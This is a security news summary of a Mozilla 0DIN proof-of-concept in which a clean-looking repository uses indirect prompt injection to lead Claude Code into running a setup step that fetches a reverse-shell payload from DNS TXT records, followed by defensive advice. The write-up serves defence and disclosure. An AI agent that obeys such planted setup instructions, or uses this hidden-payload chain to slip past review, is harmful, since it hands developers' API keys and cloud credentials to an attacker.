Mozilla 0DIN — Claude Code DNS Reverse Shell Attack via Poisoned Repository

AI relevance: Agentic coding tools like Claude Code have full access to developer environments—API keys, cloud credentials, and local secrets—while autonomously executing setup flows from untrusted repositories, creating a critical attack surface for indirect prompt injection.

What Happened

  • Mozilla's Zero Day Investigative Network (0DIN) published a proof-of-concept attack on June 25, 2026, demonstrating how a completely clean-looking GitHub repository can trick Claude Code into opening a reverse shell on a developer's machine.
  • The attack uses indirect prompt injection—malicious instructions embedded in external content the AI agent processes, not in direct user input or visible code.
  • The payload is delivered via DNS TXT records, making it invisible to static code analysis, human reviewers, and the AI agent itself. The malicious command never appears in the repository.
  • The attack chains three innocent-looking components: a normal README with setup instructions, a Python package that fails with a helpful error message, and a setup script that fetches its "config" from DNS and pipes it to bash.
  • When the developer asks Claude Code to get the project running, the agent autonomously reads the error, runs the documented fix (python3 -m axiom init), which executes the DNS-fetched reverse shell payload.
  • The attacker gains a fully interactive shell running as the developer's user, with access to every secret: ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, and environment variables.
  • The DNS payload is base64-encoded, so reverse shell signatures never appear in plaintext on disk or wire. The payload can be swapped at any time by editing one DNS record—no git commit, no diff for tools to catch.
  • This attack surface affects any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI, not just Claude Code.
  • The technique resembles CVE-2025-55284, a high-severity Claude Code vulnerability patched in June 2025, where prompt injection exfiltrated API keys via DNS subdomain encoding.

Why It Matters

The attack exploits a fundamental architectural gap: agentic coding tools have authorized access to everything an attacker needs (private environment variables, credentials, API keys, local configuration files) while simultaneously consuming untrusted content from repositories, documentation, and error messages. The attack splits its components across three systems that are never examined together: the repository, DNS infrastructure, and the developer's trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation.

What To Do

  • Surface runtime execution chains: Agents must show what a setup command will actually run, including the contents of any script it invokes and anything fetched at runtime—not just the command itself.
  • Treat setup scripts as untrusted: Developers should treat setup instructions and scripts in unfamiliar repositories as untrusted code, regardless of what their AI tool recommends.
  • Sandbox unfamiliar code: Use sandbox-first workflows for unfamiliar repositories. Run initial setup in isolated environments without access to production credentials.
  • Audit DNS-fetch-and-execute patterns: Scan for dig ... | bash or similar patterns that fetch and execute remote content. Block or flag these in CI/CD pipelines.
  • Rotate credentials after exposure: If you've opened unfamiliar repositories with agentic coding tools, assume credentials may be compromised and rotate them immediately.

Sources